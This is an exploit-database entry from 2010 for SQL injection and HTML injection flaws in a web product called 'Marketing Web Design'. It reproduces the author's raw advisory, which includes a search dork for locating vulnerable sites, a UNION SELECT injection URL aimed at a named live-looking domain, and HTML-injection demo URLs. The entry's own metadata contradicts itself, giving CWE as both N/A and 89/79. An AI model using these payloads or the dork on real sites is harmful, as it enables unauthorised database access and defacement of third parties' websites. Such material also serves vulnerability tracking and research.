Marketing Web Design Multiple Vulnerabilities

vendor:

N/A

by:

XroGuE

7,5

CVSS

HIGH

SQL Injection & HTML Injection

89, 79

CWE

Product Name: N/A

Affected Version From: All

Affected Version To: All

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Marketing Web Design Multiple Vulnerabilities

Marketing Web Design is prone to multiple vulnerabilities, including SQL injection and HTML injection. An attacker can exploit these issues to manipulate SQL queries, access or modify sensitive data, execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site, and possibly launch other attacks.

Mitigation:

Ensure that user-supplied input is properly sanitized and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

=======================================================================
# Marketing Web Design Multiple Vulnerabilities
=======================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm XroGuE member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

########################################################################
# Name: Marketing Web Design Multiple Vulnerabilities
# Vendor: http://www.marketingwebdesign.net
# Date: 2010-05-29
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
########################################################################

[+] Dork: intext:"Marketing Web Design - Posicionamiento en Buscadores"


[+] Vulnerability Page: All Pages :))

########################################################################

[+] SQL InjecTion Vulnerability:

[+] Demo: http://server/verfoto.php?id=1+and+1=1 [and+1=2]
http://www.hoopstats.com.ar/ver-noticia.php?id=-9999+and+1=2+union select 1,version(),3,4,5,6,7,8,9--


########################################################################

[+] HTML InjecTion Vulnerability:

[+] Demo: http://server/verfoto.php?id=<marquee><font color=Blue size=15>XroGuE</font></marquee>
http://server/ver-noticia.php?id=<marquee><font color=Blue size=15>XroGuE</font></marquee>

########################################################################

[+] XSS InjecTion Vulnerability:

[+] Demo: http://server/verfoto.php?id=
http://server/ver-noticia.php?id=

########################################################################